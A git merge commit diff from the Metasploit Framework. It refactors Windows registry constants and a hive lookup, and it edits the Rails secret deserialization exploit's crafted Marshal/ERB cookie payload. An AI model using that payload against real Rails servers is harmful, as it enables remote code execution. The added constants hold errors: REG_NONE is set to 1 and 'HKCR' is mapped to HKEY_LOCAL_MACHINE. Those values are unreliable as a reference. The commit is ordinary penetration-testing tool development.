Merge branch 'master' of github.com:rapid7/metasploit-framework

“Brian · “Brian · commit 8871673ada1a · 2016-09-20T17:48:06.000-05:00
diff --git a/lib/msf/core/post/windows/registry.rb b/lib/msf/core/post/windows/registry.rb
@@ -29,6 +29,51 @@ module Registry
   #
   REGISTRY_VIEW_64_BIT = 2
 
+  #
+  # Windows Registry Constants.
+  #
+  REG_NONE = 1
+  REG_SZ = 1
+  REG_EXPAND_SZ = 2
+  REG_BINARY = 3
+  REG_DWORD = 4
+  REG_LITTLE_ENDIAN = 4
+  REG_BIG_ENDIAN = 5
+  REG_LINK = 6
+  REG_MULTI_SZ = 7
+
+  HKEY_CLASSES_ROOT = 0x80000000
+  HKEY_CURRENT_USER = 0x80000001
+  HKEY_LOCAL_MACHINE = 0x80000002
+  HKEY_USERS = 0x80000003
+  HKEY_PERFORMANCE_DATA = 0x80000004
+  HKEY_CURRENT_CONFIG = 0x80000005
+  HKEY_DYN_DATA = 0x80000006
+
+  #
+  # Lookup registry hives by key.
+  #
+  def registry_hive_lookup(hive)
+    case hive
+    when 'HKCR'
+      HKEY_LOCAL_MACHINE
+    when 'HKCU'
+      HKEY_CURRENT_USER
+    when 'HKLM'
+      HKEY_LOCAL_MACHINE
+    when 'HKU'
+      HKEY_USERS
+    when 'HKPD'
+      HKEY_PERFORMANCE_DATA
+    when 'HKCC'
+      HKEY_CURRENT_CONFIG
+    when 'HKDD'
+      HKEY_DYN_DATA
+    else
+      HKEY_LOCAL_MACHINE
+    end
+  end
+
   #
   # Load a hive file
   #
diff --git a/lib/rex.rb b/lib/rex.rb
@@ -106,9 +106,6 @@ module Rex
 # Compatibility
 require 'rex/compat'
 
-# Platforms
-require 'rex/platforms'
-
 # SSLScan 
 require 'rex/sslscan/scanner'
 require 'rex/sslscan/result'
diff --git a/lib/rex/platforms.rb b/lib/rex/platforms.rb
diff --git a/lib/rex/platforms/windows.rb b/lib/rex/platforms/windows.rb
diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb
@@ -10,7 +10,7 @@
 class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::Remote::DCERPC
-  include ::Rex::Platforms::Windows
+  include Msf::Post::Windows::Registry
 
   def initialize(info = {})
     super(update_info(info,
diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb
@@ -10,7 +10,7 @@
 class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::Remote::DCERPC
-  include Rex::Platforms::Windows
+  include Msf::Post::Windows::Registry
 
   def initialize(info = {})
     super(update_info(info,
diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -200,18 +200,20 @@ def build_cookie
       return "\x04\b" +
       "o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" +
         ":\x0E@instanceo" +
-          ":\bERB\x06" +
+          ":\bERB\x07" +
             ":\t@src"+  Marshal.dump(code)[2..-1] +
+            ":\x0c@lineno"+ "i\x00" +
         ":\f@method:\vresult:" +
         "\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
     end
     if datastore['RAILSVERSION'] == 3
       return Rex::Text.encode_base64 "\x04\x08" +
       "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
         ":\x0E@instance" +
-          "o"+":\x08ERB"+"\x06" +
+          "o"+":\x08ERB"+"\x07" +
             ":\x09@src" +
               Marshal.dump(code)[2..-1] +
+            ":\x0c@lineno"+ "i\x00" +
         ":\x0C@method"+":\x0Bresult"
     end
   end
